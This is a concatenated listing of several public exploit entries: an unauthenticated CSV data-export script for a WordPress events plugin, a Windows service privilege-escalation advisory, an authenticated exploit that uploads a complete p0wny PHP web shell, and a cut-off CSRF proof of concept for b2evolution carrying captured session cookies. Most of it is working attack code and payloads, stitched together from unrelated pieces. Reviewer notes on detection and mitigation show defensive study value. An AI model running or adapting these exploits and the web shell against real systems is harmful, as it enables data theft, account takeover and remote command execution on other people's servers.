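Description:
Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions
before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated
users to exports all events data in CSV or XML format for example.
'''

import argparse
import csv
import sys

import requests

TIMEOUT = 30

# The original ASCII-art banner did not survive the listing's line collapse;
# a plain one carries the same information.
banner = """
 CVE-2021-24146 - WordPress Plugin Modern Events Calendar Lite < 5.16.5
 Export Event Data (Unauthenticated) - @Hacker5preme
"""

EXPORT_QUERY = 'wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'


def parse_args():
    """CLI options; all required so a missing one fails early instead of
    producing a 'http://None:None' URL."""
    my_parser = argparse.ArgumentParser(
        description='Wordpress Plugin Modern Events Calendar Export Event Data (Unauthenticated)')
    my_parser.add_argument('-T', '--IP', type=str, required=True)
    my_parser.add_argument('-P', '--PORT', type=str, required=True)
    my_parser.add_argument('-U', '--PATH', type=str, required=True,
                           help='WordPress base path, e.g. /wordpress or /')
    return my_parser.parse_args()


def export_url(ip, port, path):
    """Return the unauthenticated CSV export URL for the given base path.

    Leading/trailing slashes in `path` are normalised so '/wordpress/' and
    'wordpress' both produce a single-slash URL.
    """
    base = f"http://{ip}:{port}/"
    path = path.strip('/')
    if path:
        base += path + '/'
    return base + EXPORT_QUERY


def main():
    print(banner)
    args = parse_args()

    print('')
    print('[+] Exported Data: ')
    print('')
    try:
        answer = requests.get(export_url(args.IP, args.PORT, args.PATH), timeout=TIMEOUT)
    except requests.RequestException as exc:
        print(f'[-] Request failed: {exc}')
        sys.exit(1)

    if answer.status_code != 200:
        print(f'[-] Server returned HTTP {answer.status_code}')
        sys.exit(1)
    # An HTML answer (for example a login page) means the export was not
    # served; printing it as CSV rows would only be confusing.
    if 'text/html' in answer.headers.get('Content-Type', ''):
        print('[-] Received HTML instead of CSV; wrong path or the target is not vulnerable')
        sys.exit(1)

    decoded_content = answer.content.decode('utf-8', errors='replace')
    for row in csv.reader(decoded_content.splitlines(), delimiter=','):
        print(row)


if __name__ == '__main__':
    main()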
# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due to Incorrect Access Control
# Date: 2021-07-01
# Author: Andrea Intilangelo
# Vendor Homepage: http://nica.it - http://winwastenet.com
# Version: 1.0.6183.16475
# Tested on: Windows 10 Pro x64 - 20H2 and 21H1
# CVE: CVE-2021-34110

WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the service executable with a malicious file that will then be executed with "LocalSystem" privileges.

(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"

(2) Attack Vectors: replacing WinWasteService.exe and/or any .dll the service loads from the same directory.

(3) Details:
The `sc qc` output below shows the service running as LocalSystem with AUTO_START, and the `icacls` output shows `Everyone:(I)(M)` on the binary — Modify access for every user, inherited (the "(I)" flag) from the WW.PROG directory. Any local user can therefore overwrite the executable, and the replacement runs as SYSTEM the next time the service starts (e.g. at reboot). The output is from an Italian locale; labels such as NOME_PERCORSO_BINARIO (binary path) and TIPO_AVVIO (start type) map to the usual English fields.

C:\Users\user>sc qc winwasteservice
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: winwasteservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO         : 2   AUTO_START
        CONTROLLO_ERRORE   : 1   NORMAL
        NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                : 0
        NOME_VISUALIZZATO  : WinwasteService
        DIPENDENZE         :
        SERVICE_START_NAME : LocalSystem

C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
                                                          NT AUTHORITY\SYSTEM:(I)(F)
                                                          BUILTIN\Administrators:(I)(F)
                                                          BUILTIN\Users:(I)(RX)
                                                          AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
                                                          AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)

Elaborazione completata per 1 file.
Elaborazione non riuscita per 0 file C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe" C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG" C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX) AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE) Elaborazione completata per 1 file. 
Elaborazione non riuscita per 0 file C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\" C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(OI)(CI)(ID)C NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F NT AUTHORITY\SYSTEM:(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Administrators:(OI)(CI)(IO)(ID)F BUILTIN\Users:(ID)R BUILTIN\Users:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE CREATOR OWNER:(OI)(CI)(IO)(ID)F AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(OI)(CI)(IO)(ID)(accesso speciale:) GENERIC_READ GENERIC_EXECUTE
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24145
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md
#
# Review notes (defender view):
# - What the script does: it logs in to wp-login.php with the supplied admin credentials, then
#   POSTs a hand-built multipart form to wp-admin/admin.php?page=MEC-ix&tab=MEC-import whose
#   "feed" part has filename="shell.php" and Content-Type text/csv; the final print() states the
#   resulting artifact path as wp-content/uploads/shell.php.
# - Detection: an authenticated POST to the MEC-import page whose multipart "feed" part carries a
#   .php filename, and any new .php file appearing under wp-content/uploads/.
# - Mitigation: the header states the flaw affects plugin versions before 5.16.5; web-server rules
#   that refuse to execute PHP from the uploads directory limit the impact of this class of bug
#   (CWE-434) regardless of plugin version.

'''
Description:
Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request.
'''

'''
Banner:
'''
# The banner is a runtime string; its layout is reproduced as the page shows it.
banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/ * Wordpress Plugin Modern Events Calendar Lite RCE * @Hacker5preme """
print(banner)

'''
Import required modules:
'''
import requests
import argparse

'''
User-Input:
'''
# All five arguments are optional to argparse (no required=True), so a missing one arrives as
# None and the string concatenations below fail with a TypeError rather than a usage message.
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')

'''
Authentication:
'''
# One Session so the cookies set by wp-login.php are sent on the later admin request.
session = requests.Session()
# wp_path is concatenated directly before 'wp-login.php', i.e. it is expected to end with '/'.
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
# NOTE(review): direct key access raises KeyError when the response carries no Set-Cookie header,
# instead of reaching the "Authentication failed" branch below.
auth_header = auth.headers['Set-Cookie']
# Login success is inferred from the wordpress_logged_in cookie being set.
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()

'''
Exploit:
'''
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import"
# Exploit Header:
# The boundary declared here must match the one used inside the hand-built body string below.
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1"
}
# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell
# The multipart body is one literal string: a "feed" file part (filename shell.php, declared as
# text/csv, content = the p0wny PHP/HTML page) followed by a "mec-ix-action" field set to
# import-start-bookings. The file content is a runtime value and is reproduced unchanged.
body = "-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"feed\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"mec-ix-action\"\r\n\r\nimport-start-bookings\r\n-----------------------------29650037893637916779865254589--\r\n"
# Exploit
# The upload response is not inspected; the success message below is printed unconditionally.
session.post(exploit_url, headers=header, data=body)
print('')
# NOTE(review): wp_path is concatenated elsewhere directly before 'wp-login.php', so when it ends
# with '/' this printed URL contains a doubled slash before wp-content.
print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')
print('')
  18. # Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) # Exploit Author: Alperen Ergel (@alpernae) # Vendor Homepage: https://b2evolution.net/ # Software Link: https://b2evolution.net/downloads/7-2-2 # Version : 7.2.2 # Tested on: Kali Linux # Category: WebApp ######## Description ######## Allows to attacker change admin account details. ######## Proof of Concept ######## ===> REQUEST <==== POST /b2evolution/evoadm.php HTTP/1.1 Host: s2.demo.opensourcecms.com Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt; __cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK- zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1031 Origin: https://s2.demo.opensourcecms.com Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ## < SNIPP > edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID= 
&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D= &uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7= http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1 #### Proof-Of-Concept #### <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST"> <input type="hidden" name="edited&#95;user&#95;login" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;firstname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;lastname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;nickname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;gender" value="M" /> <input type="hidden" name="edited&#95;user&#95;ctry&#95;ID" value="233" /> <input type="hidden" name="edited&#95;user&#95;rgn&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;subrg&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;city&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;min" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;max" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;month" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;day" value="" /> <input type="hidden" 
